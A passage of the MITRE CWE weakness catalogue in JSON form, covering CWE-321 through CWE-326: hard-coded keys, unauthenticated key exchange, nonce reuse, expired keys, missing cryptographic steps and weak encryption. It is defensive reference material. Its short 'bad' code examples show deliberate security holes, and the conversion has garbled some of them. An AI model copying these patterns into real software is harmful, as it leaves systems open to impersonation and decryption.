Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-23","Modification_Comment":"updated Abstraction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Transmission of Sensitive Information","attr":{"@_Date":"2009-01-12"}}}},"321":{"attr":{"@_ID":"321","@_Name":"Use of Hard-coded Cryptographic Key","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If hard-coded cryptographic keys are used, it is almost certain that malicious users will gain access through the account in question."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Prevention schemes mirror that of hard-coded password storage."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-92"},"Intro_Text":"The following code examples attempt to verify a password using a hard-coded cryptographic key.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password,\\"68af404b513073584c4b6f22b6c63e6b\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","xhtml:br":["",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean VerifyAdmin(String password) {","xhtml:div":{"#text":"if (password.equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}System.out.println(\\"Incorrect Password!\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Entering Diagnostic Mode...\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (password.Equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}Console.WriteLine(\\"Incorrect Password!\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Entering Diagnostic Mode...\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of hard-coded cryptographic key"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP33","Entry_Name":"Hardcoded sensitive data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"The main difference between the use of hard-coded passwords and the use of hard-coded cryptographic keys is the false sense of security that the former conveys. Many people believe that simply hashing a hard-coded password before storage will protect the information from malicious users. However, many hashes are reversible (or at least vulnerable to brute force attacks) -- and further, many authentication protocols simply request the hash itself, making it no better than a password.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"322":{"attr":{"@_ID":"322","@_Name":"Key Exchange without Entity Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs a key exchange with an actor without verifying the identity of that actor.","Extended_Description":"Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor by modifying traffic between the two entities. Typically, this involves a victim client that contacts a malicious server that is impersonating a trusted server. If the client skips authentication or ignores an authentication failure, the malicious server may request authentication information from the user. The malicious server can then use this authentication information to log in to the trusted server using the victim\'s credentials, sniff traffic between the victim and trusted server, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"295","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"No authentication takes place in this process, bypassing an assumed protection of encryption."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The encrypted communication between a user and a trusted host may be subject to sniffing by any actor in the communication path."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper authentication is included in the system design."},{"Phase":"Implementation","Description":"Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Many systems have used Diffie-Hellman key exchange without authenticating the entities exchanging keys, allowing attackers to influence communications by redirecting or interfering with the communication path. Many people using SSL/TLS skip the authentication (often unknowingly)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Key exchange without entity authentication"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 23: Improper Use of PKI, Especially SSL." Page 347"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Untrustworthy Credentials", Page 37"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"clarified the description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, References, Relationships"}]}},"323":{"attr":{"@_ID":"323","@_Name":"Reusing a Nonce, Key Pair in Encryption","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Nonces should be used for the present occasion and only once.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Potentially a replay attack, in which an attacker could send the same data twice, could be crafted if nonces are allowed to be reused. This could allow a user to send a message which masquerades as a valid message from a valid user."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Refuse to reuse nonce values."},{"Phase":"Implementation","Description":"Use techniques such as requiring incrementing, time based and/or challenge response to assure uniqueness of nonces."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code takes a password, concatenates it with a nonce, then encrypts it before sending over a network:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void encryptAndSendPassword(char *password){}","xhtml:div":{"#text":"char *nonce = \\"bad\\";...char *data = (unsigned char*)malloc(20);int para_size = strlen(nonce) + strlen(password);char *paragraph = (char*)malloc(para_size);SHA1((const unsigned char*)paragraph,parsize,(unsigned char*)data);sendEncryptedData(data)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}},"Body_Text":"Because the nonce used is always the same, an attacker can impersonate a trusted party by intercepting and resending the encrypted password. This attack avoids the need to learn the unencrypted password."},{"Intro_Text":"This code sends a command to a remote server, using an encrypted password and nonce to prove the command is from a trusted party:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String command = new String(\\"some command to execute\\");MessageDigest nonce = MessageDigest.getInstance(\\"SHA\\");nonce.update(String.valueOf(\\"bad nonce\\"));byte[] nonce = nonce.digest();MessageDigest password = MessageDigest.getInstance(\\"SHA\\");password.update(nonce + \\"secretPassword\\");byte[] digest = password.digest();sendCommand(digest, command)","xhtml:br":["","","","","","",""]}},"Body_Text":"Once again the nonce used is always the same. An attacker may be able to replay previous legitimate commands or execute new arbitrary commands."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reusing a nonce, key pair in encryption"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"324":{"attr":{"@_ID":"324","@_Name":"Use of a Key Past its Expiration Date","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.","Extended_Description":"While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged periods of time have a decreasing probability of integrity. For this reason, it is important to replace keys within a period of time proportional to their strength.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"298","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"The cryptographic key in question may be compromised, providing a malicious user with a method for authenticating as the victim."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Adequate consideration should be put in to the user interface in order to notify users previous to the key\'s expiration, to explain the importance of new key generation and to walk users through the process as painlessly as possible."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to verify that a certificate is valid.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERRCERT_NOT_YET_VALID==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"The code checks if the certificate is not yet valid, but it fails to check if a certificate is past its expiration date, thus treating expired certificates as valid."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using a key past its expiration date"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 23: Improper Use of PKI, Especially SSL." Page 347"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Using a Key Past its Expiration Date","attr":{"@_Date":"2008-04-11"}}}},"325":{"attr":{"@_ID":"325","@_Name":"Missing Cryptographic Step","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"358","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Developers sometimes omit \\"expensive\\" (resource-intensive) steps in order to improve performance, especially in devices with limited memory or slower CPUs. This step may be taken under a mistaken impression that the step is unnecessary for the cryptographic algorithm."},{"Phase":"Architecture and Design"},{"Phase":"Requirements","Note":"This issue may happen when the requirements for the cryptographic algorithm are not clearly stated."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]},{"Scope":["Accountability","Non-Repudiation"],"Impact":"Hide Activities"}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2001-1585","Description":"Missing challenge-response step allows authentication bypass using public key.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1585"}},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Required Cryptographic Step"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"68"}}},"Notes":{"Note":[{"#text":"Overlaps incomplete/missing security check.","attr":{"@_Type":"Relationship"}},{"#text":"Can be resultant.","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Functional_Areas, Modes_of_Introduction, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Name"}],"Previous_Entry_Name":{"#text":"Missing Required Cryptographic Step","attr":{"@_Date":"2020-08-20"}}}},"326":{"attr":{"@_ID":"326","@_Name":"Inadequate Encryption Strength","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.","Extended_Description":"A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality"],"Impact":["Bypass Protection Mechanism","Read Application Data"],"Note":"An attacker may be able to decrypt the data using brute force attacks."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use an encryption scheme that is currently considered to be strong by experts in the field."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1546","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1546"},{"Reference":"CVE-2004-2172","Description":"Weak encryption (chosen plaintext attack)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2172"},{"Reference":"CVE-2002-1682","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1682"},{"Reference":"CVE-2002-1697","Description":"Weak encryption produces same ciphertext from the same plaintext blocks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1697"},{"Reference":"CVE-2002-1739","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1739"},{"Reference":"CVE-2005-2281","Description":"Weak encryption scheme","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2281"},{"Reference":"CVE-2002-1872","Description":"Weak encryption (XOR)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1872"},{"Reference":"CVE-2002-1910","Description":"Weak encryption (reversible algorithm).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1910"},{"Reference":"CVE-2002-1946","Description":"Weak encryption (one-to-one mapping).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1946"},{"Reference":"CVE-2002-1975","Description":"Encryption error uses fixed salt, simplifying brute force / dictionary attacks (overlaps randomness).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1975"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Weak Encryption"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"192"}},{"attr":{"@_CAPEC_ID":"20"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, "Cryptographic Foibles" Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 21: Using the Wrong Cryptography." Page 315"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-08","Modification_Importance":"Critical","Modification_Comment":"Clarified entry to focus on algorithms that do not have major weaknesses, but may not be strong enough for some purposes."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, 